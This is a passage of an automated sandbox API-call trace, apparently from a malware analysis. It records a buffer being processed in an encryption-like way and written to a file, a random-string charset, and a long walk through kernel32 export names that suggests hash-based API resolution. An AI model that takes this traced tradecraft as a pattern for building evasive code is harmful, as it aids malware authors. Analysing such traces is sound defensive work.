pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.273] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.273] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.273] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.274] CloseHandle (hObject=0x45c) returned 1 [0078.274] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.274] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.274] CloseHandle (hObject=0x0) returned 0 [0078.274] CloseHandle (hObject=0x458) returned 1 [0078.275] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.275] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.276] GetTickCount () returned 0x114c10e [0078.276] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.276] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.276] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.276] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.276] lstrlenA (lpString="kernel32.dll") returned 12 [0078.277] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.277] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.277] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.277] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.277] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.277] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.277] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.277] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.277] lstrlenA (lpString="ADDATOMA") returned 8 [0078.277] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.277] lstrlenA (lpString="ADDATOMW") returned 8 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.278] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.278] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.278] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.278] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.278] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.278] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.278] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.278] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.278] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.278] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.278] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.278] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.278] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.278] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.278] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.278] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.278] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.278] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.279] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.279] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.279] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.279] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.279] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.279] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.279] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.279] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.279] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.279] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.279] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.279] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.279] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.279] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.279] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.279] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.279] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.279] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.280] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.280] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.280] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.280] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.280] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.280] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.280] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.280] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.280] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.280] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.280] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.280] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.280] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.280] lstrlenA (lpString="BEEP") returned 4 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.280] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.280] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.280] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.280] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.280] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.281] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.281] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.281] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.281] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.281] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.281] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.281] lstrlenA (lpString="CANCELIO") returned 8 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.281] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.281] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.281] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.281] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.281] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.281] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.281] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.281] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.281] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.281] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.281] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.282] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.282] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.282] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.282] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.282] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.282] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.282] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.282] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.282] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.282] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.282] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.282] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.282] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.282] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.283] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.283] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.283] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.283] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.283] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.283] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.283] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.283] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.283] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.283] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.283] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.283] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.283] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.283] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.283] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.283] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.283] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.283] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.283] lstrlenA (lpString="COPYFILEA") returned 9 [0078.284] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") 